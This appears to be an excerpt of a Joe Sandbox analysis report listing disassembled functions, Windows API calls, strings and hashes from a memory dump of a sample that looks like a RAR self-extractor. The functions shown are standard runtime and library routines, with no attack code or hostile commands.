                                                            • Instruction ID: d0995fd4cb11ef05244c947a970c10177196cc32225657381f70123e8c0ddacc
                                                            • Opcode Fuzzy Hash: ef72d11b5552dcb95f010f0cbf2c111dc8f5b5319fda884a2cc1c048be0cabe6
                                                            • Instruction Fuzzy Hash: 99318F7664438596EA34EB559C42B7B73E4EF90720F60447FF986472C0FB61AD8C83A1
                                                            Function 00BFC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BFC868: _free.LIBCMT ref: 00BFC891
                                                            • _free.LIBCMT ref: 00BFC8F2
                                                              • Part of subcall function 00BF8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?), ref: 00BF8DE2
                                                              • Part of subcall function 00BF8DCC: GetLastError.KERNEL32(?,?,00BFC896,?,00000000,?,00000000,?,00BFC8BD,?,00000007,?,?,00BFCCBA,?,?), ref: 00BF8DF4
                                                            • _free.LIBCMT ref: 00BFC8FD
                                                            • _free.LIBCMT ref: 00BFC908
                                                            • _free.LIBCMT ref: 00BFC95C
                                                            • _free.LIBCMT ref: 00BFC967
                                                            • _free.LIBCMT ref: 00BFC972
                                                            • _free.LIBCMT ref: 00BFC97D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction ID: 5137776630090893f90a440fa5730cdc1b21a4d16ee48444a71ba30cdc9ea54c
                                                            • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                            • Instruction Fuzzy Hash: 45113D71580B0CAAE620B7B1CD07FFB7BEC9F01B40F404C69B39D67092DA65A94D9750
                                                            Function 00BEE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00BEE669,00BEE5CC,00BEE86D), ref: 00BEE605
                                                            • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00BEE61B
                                                            • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00BEE630
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                            • API String ID: 667068680-1718035505
                                                            • Opcode ID: 8af1fa324bf7383992ffb250928b31d8334516138315b5f6da97ff4278f1ee51
                                                            • Instruction ID: 42e40e1b373a66e80875573567d66e887ffb632be666e96de6da4b6ff12c7833
                                                            • Opcode Fuzzy Hash: 8af1fa324bf7383992ffb250928b31d8334516138315b5f6da97ff4278f1ee51
                                                            • Instruction Fuzzy Hash: 5DF0F0317A16E29F8F214FA76C84B6B32DCEE26745B1508B9ED25D3190EB20CD58DB90
                                                            Function 00BE146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BE14C2
                                                              • Part of subcall function 00BDB146: GetVersionExW.KERNEL32(?), ref: 00BDB16B
                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BE14E6
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BE1500
                                                            • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00BE1513
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BE1523
                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BE1533
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Time$File$System$Local$SpecificVersion
                                                            • String ID:
                                                            • API String ID: 2092733347-0
                                                            • Opcode ID: 96dd5ae746777723bec0ef9b96582892acbd5fb0a7ed9d801dbbf2c0d7d79739
                                                            • Instruction ID: 78476dc1d625b76144cc53a0830fd109a03bff037748c5c126d1ff6ac27db596
                                                            • Opcode Fuzzy Hash: 96dd5ae746777723bec0ef9b96582892acbd5fb0a7ed9d801dbbf2c0d7d79739
                                                            • Instruction Fuzzy Hash: 5C31E675108346ABC704DFA9C884A9FB7E8BF9C714F004A1AF995C3210E734D509CBA6
                                                            Function 00BF2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00BF2AF1,00BF02FC,00BEFA34), ref: 00BF2B08
                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BF2B16
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BF2B2F
                                                            • SetLastError.KERNEL32(00000000,00BF2AF1,00BF02FC,00BEFA34), ref: 00BF2B81
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastValue___vcrt_
                                                            • String ID:
                                                            • API String ID: 3852720340-0
                                                            • Opcode ID: 0a068b0ff8d9790eae31156a54d8df976a8af3f30c86eaa78920e9694cc28783
                                                            • Instruction ID: ace969c551b9d24dc63a6f7bb13e98cbdaf538b11b7c75565c79dba902a604f6
                                                            • Opcode Fuzzy Hash: 0a068b0ff8d9790eae31156a54d8df976a8af3f30c86eaa78920e9694cc28783
                                                            • Instruction Fuzzy Hash: 2D01D43624D31D6EEA142B787C85B7A2BE9EF01B74B610BB9FB10570E2EF114C08D144
                                                            Function 00BF97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(?,00C11030,00BF4674,00C11030,?,?,00BF3F73,00000050,?,00C11030,00000200), ref: 00BF97E9
                                                            • _free.LIBCMT ref: 00BF981C
                                                            • _free.LIBCMT ref: 00BF9844
                                                            • SetLastError.KERNEL32(00000000,?,00C11030,00000200), ref: 00BF9851
                                                            • SetLastError.KERNEL32(00000000,?,00C11030,00000200), ref: 00BF985D
                                                            • _abort.LIBCMT ref: 00BF9863
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: 58a5a5597923bde64d4cdb529684f0ac55a161ab477f72fbec8dbf9438981011
                                                            • Instruction ID: c773be0fbc737cc0204e897eb7a7116d06a7d990cb050a650a159b9106589396
                                                            • Opcode Fuzzy Hash: 58a5a5597923bde64d4cdb529684f0ac55a161ab477f72fbec8dbf9438981011
                                                            • Instruction Fuzzy Hash: 5BF0A43614061966C7123328BC4AB3F2AE9CFD27F5F3501B8F71893192FE24880DC565
                                                            Function 00BEDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00BEDC47
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BEDC61
                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BEDC72
                                                            • TranslateMessage.USER32(?), ref: 00BEDC7C
                                                            • DispatchMessageW.USER32(?), ref: 00BEDC86
                                                            • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00BEDC91
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                            • String ID:
                                                            • API String ID: 2148572870-0
                                                            • Opcode ID: 49419717015329ce073e85b80d8927e8ddd6d94275382f5436b2cd0a8132eddd
                                                            • Instruction ID: 4a137cd92e767079b48f1f6a87ed5b23ecbf220b554a2768844b14ae2bc02840
                                                            • Opcode Fuzzy Hash: 49419717015329ce073e85b80d8927e8ddd6d94275382f5436b2cd0a8132eddd
                                                            • Instruction Fuzzy Hash: 8AF04F72A01299BBCB206BA5DC4CFCF7FBDEF41791B104011F50AD2060D675D646C7A0
                                                            Function 00BDC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BE05DA: _wcslen.LIBCMT ref: 00BE05E0
                                                              • Part of subcall function 00BDB92D: _wcsrchr.LIBVCRUNTIME ref: 00BDB944
                                                            • _wcslen.LIBCMT ref: 00BDC197
                                                            • _wcslen.LIBCMT ref: 00BDC1DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_wcsrchr
                                                            • String ID: .exe$.rar$.sfx
                                                            • API String ID: 3513545583-31770016
                                                            • Opcode ID: 814cb8b037cdb4c9690e311dc28f90a19b4fa3e6cdf9620c601382077f57db2e
                                                            • Instruction ID: 59594a9415c9335bf80dea46f2b8643369d28cab3e0cf3aff2958ec03a42ca86
                                                            • Opcode Fuzzy Hash: 814cb8b037cdb4c9690e311dc28f90a19b4fa3e6cdf9620c601382077f57db2e
                                                            • Instruction Fuzzy Hash: 904114225413A295C732AF648852E7AFBE8EF51744F1449CFF982AB281FB604D81C395
                                                            Function 00BECE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000800,?), ref: 00BECE9D
                                                              • Part of subcall function 00BDB690: _wcslen.LIBCMT ref: 00BDB696
                                                            • _swprintf.LIBCMT ref: 00BECED1
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                            • SetDlgItemTextW.USER32(?,00000066,00C1946A), ref: 00BECEF1
                                                            • EndDialog.USER32(?,00000001), ref: 00BECFFE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                            • String ID: %s%s%u
                                                            • API String ID: 110358324-1360425832
                                                            • Opcode ID: f02b2ae117f112f45cd170ca1791e590a84d0784557e261928cb4426f1f3f114
                                                            • Instruction ID: 030a5417082dcb89b268a8c1fa5ed7cc995fe1691672ff541a5705ae37c68771
                                                            • Opcode Fuzzy Hash: f02b2ae117f112f45cd170ca1791e590a84d0784557e261928cb4426f1f3f114
                                                            • Instruction Fuzzy Hash: 02416EB1900298AADF219B51CC95FEE77FCEB05300F4080E6F909E7151EBB09A85CF65
                                                            Function 00BDBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00BDBB27
                                                            • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00BDA275,?,?,00000800,?,00BDA23A,?,00BD755C), ref: 00BDBBC5
                                                            • _wcslen.LIBCMT ref: 00BDBC3B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CurrentDirectory
                                                            • String ID: UNC$\\?\
                                                            • API String ID: 3341907918-253988292
                                                            • Opcode ID: 0fa8594239e85cf98a2eaee5fa3013a0e9aeadeaf5b56734e732fb9f0cb3de5d
                                                            • Instruction ID: 763aa233fd2a1b53182c54f3cf6d6a0548c6ab0521ecf4f6c6fe6460fffe6ddc
                                                            • Opcode Fuzzy Hash: 0fa8594239e85cf98a2eaee5fa3013a0e9aeadeaf5b56734e732fb9f0cb3de5d
                                                            • Instruction Fuzzy Hash: E0418B35410259FACF21AF21CC41EEAB7E9FF45790F1944A7F915A3251FBB09A90CB60
                                                            Function 00BEB6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadBitmapW.USER32(00000065), ref: 00BEB6ED
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00BEB712
                                                            • DeleteObject.GDI32(00000000), ref: 00BEB744
                                                            • DeleteObject.GDI32(00000000), ref: 00BEB767
                                                              • Part of subcall function 00BEA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00BEB73D,00000066), ref: 00BEA6D5
                                                              • Part of subcall function 00BEA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA6EC
                                                              • Part of subcall function 00BEA6C2: LoadResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA703
                                                              • Part of subcall function 00BEA6C2: LockResource.KERNEL32(00000000,?,?,?,00BEB73D,00000066), ref: 00BEA712
                                                              • Part of subcall function 00BEA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00BEB73D,00000066), ref: 00BEA72D
                                                              • Part of subcall function 00BEA6C2: GlobalLock.KERNEL32(00000000), ref: 00BEA73E
                                                              • Part of subcall function 00BEA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00BEA762
                                                              • Part of subcall function 00BEA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00BEA7A7
                                                              • Part of subcall function 00BEA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00BEA7C6
                                                              • Part of subcall function 00BEA6C2: GlobalFree.KERNEL32(00000000), ref: 00BEA7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                            • String ID: ]
                                                            • API String ID: 1797374341-3352871620
                                                            • Opcode ID: 2abee1a638ac12d7220257af01a8716e4af3daacf3c061712029373a4d25e0db
                                                            • Instruction ID: 41650a791973730e5f8cfd7bda2b34edf3f8903dc55a9fff27554e4cb1bc301b
                                                            • Opcode Fuzzy Hash: 2abee1a638ac12d7220257af01a8716e4af3daacf3c061712029373a4d25e0db
                                                            • Instruction Fuzzy Hash: 5F01CC36900291ABD7127B769C49FBF7AFEAFC1B52F080091F900A7291DF258D0942B2
                                                            Function 00BED600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
                                                              • Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370
                                                            • EndDialog.USER32(?,00000001), ref: 00BED64B
                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00BED661
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 00BED675
                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 00BED684
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: RENAMEDLG
                                                            • API String ID: 445417207-3299779563
                                                            • Opcode ID: 30676164e8c07198ead8f3d4e9c75f25d8bb3b4eddb76fe02e15d87059246389
                                                            • Instruction ID: a72d8fbe9c48d0ed5cfa20ce704559b981ba6477c83501c1d02c7a64ddbdfdd4
                                                            • Opcode Fuzzy Hash: 30676164e8c07198ead8f3d4e9c75f25d8bb3b4eddb76fe02e15d87059246389
                                                            • Instruction Fuzzy Hash: 3801B533394294BED2214F659E09F5F77ADEB5AB01F110465F205A60D0C7E299058B69
                                                            Function 00BF7E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BF7E24,00000000,?,00BF7DC4,00000000,00C0C300,0000000C,00BF7F1B,00000000,00000002), ref: 00BF7E93
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BF7EA6
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00BF7E24,00000000,?,00BF7DC4,00000000,00C0C300,0000000C,00BF7F1B,00000000,00000002), ref: 00BF7EC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 36be2565249ab0adca02d0597008795b82679a8371978eb162eafbe4e9f8fb8e
                                                            • Instruction ID: 6386e4f468d946c8876af695dd94c971f52c68a63c64fe79d3b33cb33eabbe7e
                                                            • Opcode Fuzzy Hash: 36be2565249ab0adca02d0597008795b82679a8371978eb162eafbe4e9f8fb8e
                                                            • Instruction Fuzzy Hash: A9F04F31A40218BBDB119FA4DC09BAEBFB8EB44715F0140EAF805A22A0DF309E44CA90
                                                            Function 00BDF2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BE081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00BE0836
                                                              • Part of subcall function 00BE081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00BDF2D8,Crypt32.dll,00000000,00BDF35C,?,?,00BDF33E,?,?,?), ref: 00BE0858
                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00BDF2E4
                                                            • GetProcAddress.KERNEL32(00C181C8,CryptUnprotectMemory), ref: 00BDF2F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                            • API String ID: 2141747552-1753850145
